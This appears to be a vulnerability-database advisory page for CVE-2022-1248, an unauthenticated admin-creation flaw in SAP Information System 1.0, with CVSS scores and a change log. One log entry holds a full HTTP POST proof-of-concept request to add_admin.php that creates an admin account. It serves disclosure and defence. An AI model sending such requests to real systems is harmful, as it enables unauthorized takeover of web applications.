SAP Information System 1.0 POST Request add_admin.php improper authentication

A vulnerability was found in SAP Information System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /SAP_Information_System/controllers/add_admin.php of the component POST Request Handler. The manipulation leads to improper authentication. Using CWE to declare the problem leads to CWE-287. The weakness was published 04/06/2022. This vulnerability is handled as CVE-2022-1248. The attack may be launched remotely. Technical details are available. Furthermore, there is an exploit available. The structure of the vulnerability defines a possible price range of USD $0-$5k at the moment. It is declared as proof-of-concept. The exploit is available at vuldb.com. As 0-day the estimated underground price was around $0-$5k. A possible mitigation has been published even before and not after the disclosure of the vulnerability.

Timeline

The analysis of the timeline helps to identify the required approach and handling of single vulnerabilities and vulnerability collections. This overview makes it possible to see less important slices and more severe hotspots at a glance. Initiating immediate vulnerability response and prioritizing of issues is possible.

User

130
243792

Field

exploit_sourcecode2
vulnerability_cvss3_meta_tempscore2
exploit_publicity1
source_cve_nvd_summary1
vulnerability_cvss3_cna_basescore1

Commit Conf

90%29
70%10
50%10
100%3

Approve Conf

90%29
70%10
80%10
100%1
IDCommitedUserFieldChangeRemarksAcceptedStatusC
1235701904/09/2022mrempysourcecode04/10/2022we declare full http recordings as PoC exploit
0
1235701804/09/2022mrempypublicity004/10/2022we declare full http recordings as PoC exploit
0
1235094604/08/2022VulD...cve_nvd_summaryA vulnerability was found in SAP Information System 1.0 which has been rated as critical. Affected by this issue is the file /SAP_Information_System/controllers/add_admin.php. An unauthenticated attacker is able to create a new admin account for the web application with a simple POST request. Exploit details were disclosed.cvedetails.com04/08/2022accepted
70
1235094504/08/2022VulD...cvss3_cna_basescore7.3see CVSS documentation04/08/2022accepted
90
1235094404/08/2022VulD...cvss3_meta_tempscore6.9see CVSS documentation04/08/2022accepted
90
1235094304/08/2022VulD...cve_cnaVulDBnvd.nist.gov04/08/2022accepted
70
1235094204/08/2022VulD...cvss3_cna_aLnvd.nist.gov04/08/2022accepted
70
1235094104/08/2022VulD...cvss3_cna_iLnvd.nist.gov04/08/2022accepted
70
1235094004/08/2022VulD...cvss3_cna_cLnvd.nist.gov04/08/2022accepted
70
1235093904/08/2022VulD...cvss3_cna_sUnvd.nist.gov04/08/2022accepted
70
1235093804/08/2022VulD...cvss3_cna_uiNnvd.nist.gov04/08/2022accepted
70
1235093704/08/2022VulD...cvss3_cna_prNnvd.nist.gov04/08/2022accepted
70
1235093604/08/2022VulD...cvss3_cna_acLnvd.nist.gov04/08/2022accepted
70
1235093504/08/2022VulD...cvss3_cna_avNnvd.nist.gov04/08/2022accepted
70
1234732604/06/2022VulD...sourcecodePOST /SAP_Information_System/controllers/add_admin.php HTTP/1.1 Host: target.com Content-Length: 345 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI Origin: http://target.com Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c Connection: close ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="username" hacker ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="password" P@ssw0rd! ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="user" admin ------WebKitFormBoundaryYELEK8fMdX63l0iI--04/06/2022accepted
100
1234691004/06/2022VulD...price_0day$0-$5ksee exploit price documentation04/06/2022accepted
90
1234690904/06/2022VulD...cvss3_meta_tempscore6.6see CVSS documentation04/06/2022accepted
90
1234690804/06/2022VulD...cvss3_meta_basescore7.3see CVSS documentation04/06/2022accepted
90
1234690704/06/2022VulD...cvss3_vuldb_tempscore6.6see CVSS documentation04/06/2022accepted
90
1234690604/06/2022VulD...cvss3_vuldb_basescore7.3see CVSS documentation04/06/2022accepted
90

32 more entries are not shown

🔒 Login Required

You need to signup and login to see more of the remaining 32 results.

PreviousOverviewNext

Do you want to use VulDB in your project?

Use the official API to access entries easily!